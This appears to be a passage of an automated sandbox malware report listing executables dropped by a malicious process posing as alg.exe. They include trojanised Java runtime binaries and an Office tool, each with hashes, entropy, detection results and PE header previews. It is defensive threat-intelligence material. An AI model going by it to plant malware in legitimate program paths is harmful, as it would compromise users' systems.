Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4...LC................@..............................L.......M... ..................................................X..P........+C.....\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1158144
Entropy (8bit):	5.068076882289367
Encrypted:	false
SSDEEP:	12288:tdXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tdsqjnhMgeiCl7G0nehbGZpbD
MD5:	DA37DBC7D76135623C8DD75303FB00A0
SHA1:	4C806120AE55441E4BCFFC45595D692A3F132D83
SHA-256:	1938B980FC58C7A6300F8928E6FBE5160CDF3DD9566EF638817C80D91EE21FD6
SHA-512:	251E203AA7538A266193849D5085A209B14B323F8405F87FC91F5A1DE81641803E852E63CFBF65AAD8F149971410FE8BD5197A75599CD2AC6EDA368D84E4641C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032402209577644
Encrypted:	false
SSDEEP:	12288:XKCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:6CsqjnhMgeiCl7G0nehbGZpbD
MD5:	856047393A7AF49F331BB7D40E9A34AB
SHA1:	BF3687B10E82E21E2BD4E7C5384BC95807A3E059
SHA-256:	9A4E34A63BF6624E04EEAED3B15429F3069417C4D3259F3CDA6EEE3E3E9188F2
SHA-512:	2C78597CDE09F8C6DD51C879DF85A9A2BE0B9DBACE36CC5D90256B805DBB8CC6CB0F1EBCE2B2B522C011F76A781F687A36D87E94565FB06EAD8D93B7C6DE3119
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................h.......................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446058377785624
Encrypted:	false
SSDEEP:	12288:enEbH0j4x7R6SvyCMDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:ekwOtO7DsqjnhMgeiCl7G0nehbGZpbD
MD5:	612F1AB85E9C179CA22ADEB7245CAF08
SHA1:	10EA0A918DB88DDBB134EC9D3D4E9692A7629659
SHA-256:	241FA195DBF1C06A0A0817345FBD1FB3B88F88EE6FBCCA227BF677BE80129F3C
SHA-512:	B76509F29EA694256E97F565E238BBB23F15237464F55F8380497A502A212A291E2171EE753B91F3F4AB90B3D950ABA9C0FF3C45B642C024F9915B88AECB2040
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1212416
Entropy (8bit):	5.119719515868034
Encrypted:	false
SSDEEP:	12288:+v1vveXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:C1+sqjnhMgeiCl7G0nehbGZpbD
MD5:	677809BFC95EF597873C8C0B6B7ECF29
SHA1:	3D14DAB79C6066757DB6CF0F9B7B4E95BB7404BD
SHA-256:	B0895C330CEEB3E663F5D85B30F52F1797F4F21521033BCC4C0C1D94DECE2C50
SHA-512:	84FD40AA304A592FD7FA84462F7E4482FDEB5273CC6D65466560FA581FD811A06D6E3F2F9AE61A4FD9B102BE90B2FC438B7AF62348DFDDD40F70678555B295A4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446809897472357
Encrypted:	false
SSDEEP:	24576:TnU/h/4K0sqjnhMgeiCl7G0nehbGZpbD:TU/VQDmg27RnWGj
MD5:	0A535D20D15D371C5490F3BEAFCA98E7
SHA1:	ACEAADED97078151DACDE6782F3FE899B099315F
SHA-256:	8DE09486E1D40BA2602AC2261085F942D08E7070BA296E0A381C39EBF64A7F7E
SHA-512:	1426B45C10F5016A667509F7B0334B25F554491CDEB41DCEBF195B4113C2AABAF88B0D5FE396E9B0ABA7A7DA236B8137397CF7ADE5E1E60663C0ECA49A068913
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......7f.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483725966529423
Encrypted:	false
SSDEEP:	24576:+x71iBLZ05jNTmJWExHsqjnhMgeiCl7G0nehbGZpbD:+xhiHIjNgbDmg27RnWGj
MD5:	EE30AE25194C32FAC876F5CD5C30E1BA
SHA1:	6E4CCE9F033902AD08775A881055B18CA04BA8EB
SHA-256:	CD19D9BB1FDF42D38087B2BA24EB2A16583575DDD3D267D808333658A2291CD1
SHA-512:	CCDFE8A2D9F79FE466AA8677839AFAA6632E0428679E8B46A381010F3AD00E20FF45EAC5F81F1D8D6AF9E4A6AF4E181ABFFA2C9ED478842DDE39D38597F5CC23
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................V...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032887627387577
Encrypted:	false
SSDEEP:	12288:T3rSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:r+sqjnhMgeiCl7G0nehbGZpbD
MD5:	A1BCDBF7CE0A61F9548CA4FFFC943C2F
SHA1:	0592717FC7E75D6508141D7C6C962745A828FA26
SHA-256:	AC8722D6B4937F0B5E99A24F876D2FA7237266165B68A7286DDC5500F855E324
SHA-512:	9A1A6F3B7B3738E1C09808A87747E720EF4A06095495E7C079301785BD57F5908038D231322AFCB5DDAABB679E73B011190B1742A05D98912E2ECA2F1DBA0BAE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................U.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242112
Entropy (8bit):	5.1726689502081244
Encrypted:	false
SSDEEP:	12288:fYdP/RXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AdP/RsqjnhMgeiCl7G0nehbGZpbD
MD5:	E291AB2466AA7DDC8B97FDB6FE9D9303
SHA1:	8A93EB66427B543A98D9E402FCEE929AF9BBAFE4
SHA-256:	028E86007CEB28B318E75B7044DEF137599F785CADCFEAEE6D17DD914C7119C4
SHA-512:	55F81E8CBD751DD0ED87FF4D85A50AF2A45A333FFF92E635063943D8BCD101DD583D27674DDCABFD3AD34B995071704AF5A11112FF5A4F019FC820011FB54EC3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032909609026544
Encrypted:	false
SSDEEP:	12288:3y5aXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iUsqjnhMgeiCl7G0nehbGZpbD
MD5:	67DF68393CB0E95F3DC045E4243F3E8E
SHA1:	B9FBF07E2BA5B30424BDDE5AC5924F485F34D58C
SHA-256:	74410D8576BE252937F68ED59AD12AF87A290DDCC5B7740B99463FAC3FCBA20F
SHA-512:	5E59AB395AA03C274C119DF3C14E8F68D68B641662AF05B01B7069C92189D5822E311B43C3793482F530EC3B713084224FB0D7F859A9EEB4ACD5E5E1809BB1C0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................!........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032977525577525
Encrypted:	false
SSDEEP:	12288:kKlCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZgsqjnhMgeiCl7G0nehbGZpbD
MD5:	3552C92B75FE1279EC27AD66FB37229F
SHA1:	CC7C6EC65E948AD1EF694A4DB9AB6F417ADD5693
SHA-256:	6299AE2E1AFFACF06EDCD5D600377BBDE81803C8F2A46D550DB464EA55FE9B64
SHA-512:	D1F147196425DF761602B3E0489B8211A2F90B428F984EC99774528155331D2E35B28D40D8F34B94D18D4AAC4FF43CE603B6012623B8BD2DF9746CF7F263D3E9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................g.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032982134909226
Encrypted:	false
SSDEEP:	12288:YilCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZgsqjnhMgeiCl7G0nehbGZpbD
MD5:	36370C0BCA60C26133EFCC47515FA524
SHA1:	D4D313A6D6AC49CF388477D503211181ACD33A19
SHA-256:	DD3C48D5A48C3547F4BE56AE528F4D46415E5EEF6A72040B5BA1F9DD2918A22B
SHA-512:	799856914D35BD0B27DA5F89D97FFB43DE4E59ED6DB060CF9AC7BA1A5333099227CC85F267E69E3B1A240CD243DABC6F8642BE04E2FF04E4816E8995F518F896
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032944495460609
Encrypted:	false
SSDEEP:	12288:JTmiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tPsqjnhMgeiCl7G0nehbGZpbD
MD5:	08D9C9F2FA5AC0761D403C19DC200FF3
SHA1:	497BEAA291F020DBBC0B6A7F88EE0198D8633026
SHA-256:	7605F31B3FE318E3555BAA28153D17004149A62181DC239B0277479F9FB029EE
SHA-512:	F04DA4782C7AF7E318DC6B0C2F1BD0BFE1BCEE05073592762F3E39473729490E935C5420E7A1E3C988F86A7FB8ACA276D64EF5E07EBC4F90EF43EA0735E8A850
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................y.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.033867402748789
Encrypted:	false
SSDEEP:	12288:MameXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rjsqjnhMgeiCl7G0nehbGZpbD
MD5:	DD79DC3BAEA01FCE88BC176606491364
SHA1:	C0AEB2C01D799EA086FED734435F58857DB95B84
SHA-256:	C0D5238496F8167FED984E73BD93BFAD87A05FE9F261F5B20939CCC9B3D8C669
SHA-512:	4376AD0EB4BF104E19F3D6E6D222AFA8B90F8A00A63BE9778203C6229B3CE0FCA4686C5F51BD558E78E8528DFFAE3D19585B23F636DBC5C49D581B290FD22B0A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.0329364792638325
Encrypted:	false
SSDEEP:	12288:0Q5aXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:jssqjnhMgeiCl7G0nehbGZpbD
MD5:	115E537FF527EB0223FFAAFD6D831550
SHA1:	E8D310DA8E11B73617C0534472324428C547B3DE
SHA-256:	EAAA0BA023883B2B9E2E74D378AA15EE49F0A448C42E65F1BFF4DB139B5DC265
SHA-512:	C03F7533A8FBA62C67F418B19AD017A16D1C0F2EF6EFF9BB47EFCB2920C5C89023F3E4899E5BB3DEFFCC94989283BC73AD9D7D5B5A35B202A37836489646F240
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032970252483412
Encrypted:	false
SSDEEP:	12288:rV/CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pKsqjnhMgeiCl7G0nehbGZpbD
MD5:	0BA4CABE8C0F2F52C56FDF3145C18918
SHA1:	4552FFA14BD72AE334E19661F5D0136FD9DD54C3
SHA-256:	DB65DE714FCDBF4DFC700E5C92D276737673C6C26BBE214D29E2B74C8903DBEA
SHA-512:	42C6D6346F96A83B72CE6D57D6FD7C29CA4701108EC8D471E1C8BCB0952816DAD92BE2A263C748977C76066DF95AEDE2D1FCC1C04387194BE8360EE354F6898E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................G........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.03287508595456
Encrypted:	false
SSDEEP:	12288:nZmyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZPsqjnhMgeiCl7G0nehbGZpbD
MD5:	ED39AFABB34AD56B77478D3DB818A4AB
SHA1:	5D26773FD5E1A9DBCCA0D7EF0494933A4473A940
SHA-256:	8B273C17D53272FAEB82AED1D4DCB892AC7AF8D6FB368504AC1B8172E3EC94DE
SHA-512:	A06D6E36BE427A41ACF2C0989B3C2526CAB4E9E86CDBA8566DA3484CE68D36B2E96FC5DED095AF39AE739EA606FCF58789BC81923064D67456040E24AB6F1C23
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032917672192826
Encrypted:	false
SSDEEP:	12288:eeS6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nLsqjnhMgeiCl7G0nehbGZpbD
MD5:	EDCEFCE28245662BFE5B6C6E666BF4FA
SHA1:	BE9BA3DA9A6C6920451795DBB019492B1D1F0D3F
SHA-256:	32451FC9F0CE007B94137E3B757860AE0B5DF93541E89BBE4A4F5EFDBEBE42F5
SHA-512:	BE9BDA545604047BDBB75750B5892BDF3EA1AF2F2E587AB979292731E932CAA608CECC1A831D8CCC32B6251FC794F9575FB601DAA29D1619FC8066D31F2561AE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032977074476584
Encrypted:	false
SSDEEP:	12288:D5/CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1KsqjnhMgeiCl7G0nehbGZpbD
MD5:	BF72AAF9B19C96C67C0407E27735F51E
SHA1:	997929B408C7F59B6F3F124A433D479D2A7A19C7
SHA-256:	2551B4967BFC0AAC2DB3C6C44716EA2409BAFFD5CB1B0BE81A9FE0926EEE12C9
SHA-512:	6A49952EF8CECE89CCE1543D0BD4BCF12BDE01B949CF46184BF2E7C9588B4E6AB5A76ABBF568156EEA5C465D8964E39EBA655DC7BE16289BEF920BD0ABE77BF1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................%.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1202688
Entropy (8bit):	5.098054289639609
Encrypted:	false
SSDEEP:	12288:37MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:37MsqjnhMgeiCl7G0nehbGZpbD
MD5:	0D4341F06DE86C387A0668A17A22390D
SHA1:	645E8D1B01CAFA42A5762B5569B1FE8BB9338E13
SHA-256:	B54A99040A313203DD0C37EFA2F9E7C0E9DAC3B90B76B890D529C6C189D0D047
SHA-512:	13DDCFA28F8986D7DE64DD62B476C1ED6D9A1281649AC9AE7DE4B405E36710F258B5DAD1B5BEF92B22A03284A289869EAD561D8C79A04396198398AA0A0E3B6B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@.............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142784
Entropy (8bit):	5.032312475840319
Encrypted:	false
SSDEEP:	12288:jKQuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:29sqjnhMgeiCl7G0nehbGZpbD
MD5:	D818946BE14D510D397C56B0BB9254C8
SHA1:	CE913E7DFC580F39977E4D4472887A425805B472
SHA-256:	5BEEECE1C361A26AA4FC2A7086B223B834A94F8477123BCC9A7F63C45B6F56D1
SHA-512:	23BE75611E4A0D7A745C67C274ECE8A62D0C9E42042E202CC5C1B67E04E12C551BBC33852B68DF0483D56A235E964EE9E77782FAE246C165FB266F1868644EE5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1298944
Entropy (8bit):	5.249094319618332
Encrypted:	false
SSDEEP:	24576:0i7l/3roAwsqjnhMgeiCl7G0nehbGZpbD:fl/roAsDmg27RnWGj
MD5:	BAC07D143A9DBD3CC213F87A631E14BB
SHA1:	CEA51B115752DC6DE4928AFE56EA0B98DC3CB234
SHA-256:	E957C9823007AA074B5AC2D85CCF5840AFC380DC528D7F789A992BE12D113006
SHA-512:	59A7CB04164B44F82CA545EC49A812CF618AD6BCB58FA925803CBADB582411D63CD0597866D2212463A659487BE220F44C2E0BE19C5B3C95285C868C10059643
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.......W..................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1269248
Entropy (8bit):	5.286239104232259
Encrypted:	false
SSDEEP:	12288:M5bfQnaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MNfQnasqjnhMgeiCl7G0nehbGZpbD
MD5:	9829E89A557A52FE3AB7672AED0A3F06
